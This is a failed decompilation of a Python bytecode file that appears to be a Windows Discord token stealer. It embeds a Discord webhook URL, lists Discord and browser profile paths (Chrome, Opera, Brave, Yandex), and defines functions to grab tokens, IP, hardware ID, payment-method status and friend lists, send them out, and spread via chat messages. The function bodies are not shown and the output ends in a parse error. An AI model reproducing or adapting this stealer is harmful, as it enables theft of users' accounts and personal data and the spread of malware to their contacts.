
# file test/30666.pyc
# --- This code section failed: ---

 L.   1         0  LOAD_CONST               0
                2  LOAD_CONST               None
                4  IMPORT_NAME              re
                6  STORE_NAME               re
                8  LOAD_CONST               0
               10  LOAD_CONST               None
               12  IMPORT_NAME              os
               14  STORE_NAME               os

 L.   2        16  LOAD_NAME                os
               18  LOAD_ATTR                name
               20  LOAD_STR                 'nt'
               22  COMPARE_OP               !=
               24  POP_JUMP_IF_FALSE    32  'to 32'

 L.   3        26  LOAD_NAME                exit
               28  CALL_FUNCTION_0       0  ''
               30  POP_TOP          
             32_0  COME_FROM            24  '24'

 L.   4        32  LOAD_CONST               0
               34  LOAD_CONST               ('findall',)
               36  IMPORT_NAME              re
               38  IMPORT_FROM              findall
               40  STORE_NAME               findall
               42  POP_TOP          

 L.   5        44  LOAD_CONST               0
               46  LOAD_CONST               None
               48  IMPORT_NAME              json
               50  STORE_NAME               json

 L.   6        52  LOAD_CONST               0
               54  LOAD_CONST               None
               56  IMPORT_NAME              platform
               58  STORE_NAME               plt

 L.   7        60  LOAD_CONST               0
               62  LOAD_CONST               ('loads', 'dumps')
               64  IMPORT_NAME              json
               66  IMPORT_FROM              loads
               68  STORE_NAME               loads
               70  IMPORT_FROM              dumps
               72  STORE_NAME               dumps
               74  POP_TOP          

 L.   8        76  LOAD_CONST               0
               78  LOAD_CONST               ('b64decode',)
               80  IMPORT_NAME              base64
               82  IMPORT_FROM              b64decode
               84  STORE_NAME               b64decode
               86  POP_TOP          

 L.   9        88  LOAD_CONST               0
               90  LOAD_CONST               ('Popen', 'PIPE')
               92  IMPORT_NAME              subprocess
               94  IMPORT_FROM              Popen
               96  STORE_NAME               Popen
               98  IMPORT_FROM              PIPE
              100  STORE_NAME               PIPE
              102  POP_TOP          

 L.  10       104  LOAD_CONST               0
              106  LOAD_CONST               ('Request', 'urlopen')
              108  IMPORT_NAME_ATTR         urllib.request
              110  IMPORT_FROM              Request
              112  STORE_NAME               Request
              114  IMPORT_FROM              urlopen
              116  STORE_NAME               urlopen
              118  POP_TOP          

 L.  11       120  LOAD_CONST               0
              122  LOAD_CONST               ('datetime',)
              124  IMPORT_NAME              datetime
              126  IMPORT_FROM              datetime
              128  STORE_NAME               datetime
              130  POP_TOP          

 L.  12       132  LOAD_CONST               0
              134  LOAD_CONST               ('Thread',)
              136  IMPORT_NAME              threading
              138  IMPORT_FROM              Thread
              140  STORE_NAME               Thread
              142  POP_TOP          

 L.  13       144  LOAD_CONST               0
              146  LOAD_CONST               ('sleep',)
              148  IMPORT_NAME              time
              150  IMPORT_FROM              sleep
              152  STORE_NAME               sleep
              154  POP_TOP          

 L.  14       156  LOAD_CONST               0
              158  LOAD_CONST               ('argv',)
              160  IMPORT_NAME              sys
              162  IMPORT_FROM              argv
              164  STORE_NAME               argv
              166  POP_TOP          

 L.  16       168  LOAD_STR                 'https://discord.com/api/webhooks/850782076701638716/QcYMve2R1ZfaDxcgxONVqMv2gphk1aIqT3OG-hYyErzn2G0ouxNijG2T7RZ8XLyuhsku'
              170  STORE_GLOBAL             webhook_url

 L.  19       172  LOAD_STR                 'Danish, Denmark'

 L.  20       174  LOAD_STR                 'German, Germany'

 L.  21       176  LOAD_STR                 'English, United Kingdom'

 L.  22       178  LOAD_STR                 'English, United States'

 L.  23       180  LOAD_STR                 'Spanish, Spain'

 L.  24       182  LOAD_STR                 'French, France'

 L.  25       184  LOAD_STR                 'Croatian, Croatia'

 L.  26       186  LOAD_STR                 'Lithuanian, Lithuania'

 L.  27       188  LOAD_STR                 'Hungarian, Hungary'

 L.  28       190  LOAD_STR                 'Dutch, Netherlands'

 L.  29       192  LOAD_STR                 'Norwegian, Norway'

 L.  30       194  LOAD_STR                 'Polish, Poland'

 L.  31       196  LOAD_STR                 'Portuguese, Brazilian, Brazil'

 L.  32       198  LOAD_STR                 'Romanian, Romania'

 L.  33       200  LOAD_STR                 'Finnish, Finland'

 L.  34       202  LOAD_STR                 'Swedish, Sweden'

 L.  35       204  LOAD_STR                 'Vietnamese, Vietnam'

 L.  36       206  LOAD_STR                 'Turkish, Turkey'

 L.  37       208  LOAD_STR                 'Czech, Czechia, Czech Republic'

 L.  38       210  LOAD_STR                 'Greek, Greece'

 L.  39       212  LOAD_STR                 'Bulgarian, Bulgaria'

 L.  40       214  LOAD_STR                 'Russian, Russia'

 L.  41       216  LOAD_STR                 'Ukranian, Ukraine'

 L.  42       218  LOAD_STR                 'Thai, Thailand'

 L.  43       220  LOAD_STR                 'Chinese, China'

 L.  44       222  LOAD_STR                 'Japanese'

 L.  45       224  LOAD_STR                 'Chinese, Taiwan'

 L.  46       226  LOAD_STR                 'Korean, Korea'

 L.  18       228  LOAD_CONST               ('da', 'de', 'en-GB', 'en-US', 'es-ES', 'fr', 'hr', 'lt', 'hu', 'nl', 'no', 'pl', 'pt-BR', 'ro', 'fi', 'sv-SE', 'vi', 'tr', 'cs', 'el', 'bg', 'ru', 'uk', 'th', 'zh-CN', 'ja', 'zh-TW', 'ko')
              230  BUILD_CONST_KEY_MAP_28    28 
              232  STORE_NAME               languages

 L.  49       234  LOAD_NAME                os
              236  LOAD_METHOD              getenv
              238  LOAD_STR                 'LOCALAPPDATA'
              240  CALL_METHOD_1         1  ''
              242  STORE_NAME               LOCAL

 L.  50       244  LOAD_NAME                os
              246  LOAD_METHOD              getenv
              248  LOAD_STR                 'APPDATA'
              250  CALL_METHOD_1         1  ''
              252  STORE_NAME               ROAMING

 L.  52       254  LOAD_NAME                ROAMING
              256  LOAD_STR                 '\\Discord'
              258  BINARY_ADD       

 L.  53       260  LOAD_NAME                ROAMING
              262  LOAD_STR                 '\\discordcanary'
              264  BINARY_ADD       

 L.  54       266  LOAD_NAME                ROAMING
              268  LOAD_STR                 '\\discordptb'
              270  BINARY_ADD       

 L.  55       272  LOAD_NAME                LOCAL
              274  LOAD_STR                 '\\Google\\Chrome\\User Data\\Default'
              276  BINARY_ADD       

 L.  56       278  LOAD_NAME                ROAMING
              280  LOAD_STR                 '\\Opera Software\\Opera Stable'
              282  BINARY_ADD       

 L.  57       284  LOAD_NAME                LOCAL
              286  LOAD_STR                 '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
              288  BINARY_ADD       

 L.  58       290  LOAD_NAME                LOCAL
              292  LOAD_STR                 '\\Yandex\\YandexBrowser\\User Data\\Default'
              294  BINARY_ADD       

 L.  51       296  LOAD_CONST               ('Discord', 'Discord Canary', 'Discord PTB', 'Google Chrome', 'Opera', 'Brave', 'Yandex')
              298  BUILD_CONST_KEY_MAP_7     7 
              300  STORE_NAME               PATHS

 L.  60       302  LOAD_CONST               (None, 'application/json')
              304  LOAD_CODE                <code_object getheaders>
              306  LOAD_STR                 'getheaders'
              308  MAKE_FUNCTION_1          'default'
              310  STORE_NAME               getheaders

 L.  68       312  LOAD_CODE                <code_object getuserdata>
              314  LOAD_STR                 'getuserdata'
              316  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              318  STORE_NAME               getuserdata

 L.  73       320  LOAD_CODE                <code_object gettokens>
              322  LOAD_STR                 'gettokens'
              324  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              326  STORE_NAME               gettokens

 L.  84       328  LOAD_CODE                <code_object getdeveloper>
              330  LOAD_STR                 'getdeveloper'
              332  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              334  STORE_NAME               getdeveloper

 L.  91       336  LOAD_CODE                <code_object getip>
              338  LOAD_STR                 'getip'
              340  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              342  STORE_NAME               getip

 L. 107       344  LOAD_CODE                <code_object getavatar>
              346  LOAD_STR                 'getavatar'
              348  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              350  STORE_NAME               getavatar

 L. 114       352  LOAD_CODE                <code_object gethwid>
              354  LOAD_STR                 'gethwid'
              356  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              358  STORE_NAME               gethwid

 L. 117       360  LOAD_CODE                <code_object getfriends>
              362  LOAD_STR                 'getfriends'
              364  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              366  STORE_NAME               getfriends

 L. 122       368  LOAD_CODE                <code_object getchat>
              370  LOAD_STR                 'getchat'
              372  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              374  STORE_NAME               getchat

 L. 127       376  LOAD_CODE                <code_object has_payment_methods>
              378  LOAD_STR                 'has_payment_methods'
              380  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              382  STORE_NAME               has_payment_methods

 L. 132       384  LOAD_CODE                <code_object send_message>
              386  LOAD_STR                 'send_message'
              388  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              390  STORE_NAME               send_message

 L. 137       392  LOAD_CODE                <code_object spread>
              394  LOAD_STR                 'spread'
              396  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              398  STORE_NAME               spread

 L. 146       400  LOAD_CODE                <code_object main>
              402  LOAD_STR                 'main'
              404  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              406  STORE_NAME               main

 L. 279       408  SETUP_FINALLY       420  'to 420'

 L. 280       410  LOAD_NAME                main
              412  CALL_FUNCTION_0       0  ''
              414  POP_TOP          
              416  POP_BLOCK        
              418  JUMP_FORWARD        466  'to 466'
            420_0  COME_FROM_FINALLY   408  '408'

 L. 281       420  DUP_TOP          
              422  LOAD_NAME                Exception
          424_426  <121>               464  ''
              428  POP_TOP          
              430  STORE_NAME               e
              432  POP_TOP          
              434  SETUP_FINALLY       456  'to 456'

 L. 282       436  LOAD_NAME                print
              438  LOAD_NAME                e
              440  CALL_FUNCTION_1       1  ''
              442  POP_TOP          

 L. 283       444  POP_BLOCK        
              446  POP_EXCEPT       
              448  LOAD_CONST               None
              450  STORE_NAME               e
              452  DELETE_NAME              e
              454  JUMP_FORWARD        466  'to 466'
            456_0  COME_FROM_FINALLY   434  '434'
              456  LOAD_CONST               None
              458  STORE_NAME               e
              460  DELETE_NAME              e
              462  <48>             
              464  <48>             
            466_0  COME_FROM           454  '454'
            466_1  COME_FROM           418  '418'

Parse error at or near `<121>' instruction at offset 424_426

Instruction context:
   
 L. 281       420  DUP_TOP          
                 422  LOAD_NAME                Exception
->           424_426  <121>               464  ''
                 428  POP_TOP          
                 430  STORE_NAME               e
                 432  POP_TOP          
                 434  SETUP_FINALLY       456  'to 456'

test/30666.pyc -- 
# decompile failed
